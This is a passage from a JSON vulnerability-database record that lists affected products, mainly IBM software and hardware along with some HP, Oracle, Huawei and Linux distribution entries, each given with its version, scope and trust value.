"vendor": "ibm", "version": "7.0.1.11" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3.4" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "jre update25", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "flex system chassis management module 2peo12p", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "websphere dashboard framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.34" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "tivoli monitoring fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.235" }, { "model": "operations manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "system m4 hd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "operations agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.12" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "0" }, { "model": "db2\u00ae workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.2" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.33" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "te60 v100r001c10spc300", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "db2\u00ae advanced enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.2" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.6" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.20" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.32" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "db2 connect enterprise edition fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7.003" }, { "model": "tivoli composite application manager for soa", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.2" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.10" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "db2\u00ae express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "oceanstor s5600t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.141" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.12" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "flashsystem 9846-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.4" }, { "model": "4210g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63800" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "netezza platform software 7.0.2.16-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.21" }, { "model": "emptoris sourcing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.0" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2" }, { "model": "system storage ts3310 tape library 641g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.16.0" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.11" }, { "model": "db2 workgroup server edition fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "operations agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.11" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.50" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "db2 advanced workgroup server edition fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "305)0" }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.8.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "infosphere optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "f5000-c/s (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079460" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "idataplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "data server driver package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "sparc enterprise m3000 xcp", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "rational performance tester", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.2" }, { "model": "system networking rackswitch g8316", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.213" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.26" }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.4" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59207)0" }, { "model": "data server client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571920" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.6.0" }, { "model": "operations manager for unix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.11" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.6" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "policy assessment and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.023" }, { "model": "oceanstor 18800f v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "virtual fabric 10gb switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "java sdk sr16-fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "ds8870 r7.3)", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.31.23.0(" }, { "model": "oceanstor v100r001c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": "18500" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105005)0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.33" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.2" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool performance manager wireless", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.14" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "smartcloud orchestrator fp1 ifix4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.37" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.12" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.12" }, { "model": "hp-ux web server suite hpuxwsatw331", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.31" }, { "model": "hp-ux php", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5.2.17.04" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.24" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.13" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.178" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "msr1000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "ultravr v100r003c00spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.8" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "jrockit r28.0.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.51" }, { "model": "jre update9", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.14" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "mq appliance m2000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.3.1" }, { "model": "puredata system for analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "data server driver for odbc and cli", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.05" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.09" }, { "model": "flex system chassis management module 2pet10f", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cognos controller fp1 if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "java sdk sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.75" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.19" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "java sdk sr10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "system networking rackswitch g8000", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.9.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.0" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.3" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "emptoris strategic supply management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.4" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4.1" }, { "model": "hp850 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.10.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "operations manager for unix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "java sdk sr4-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1" }, { "model": "data server driver package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.02" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.22" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system storage ts3310 tape library 630g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "infosphere optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "java sdk 7r1 sr2-fp10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "data server client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "policy center v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.10" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.26" }, { "model": "endpoint manager for remote 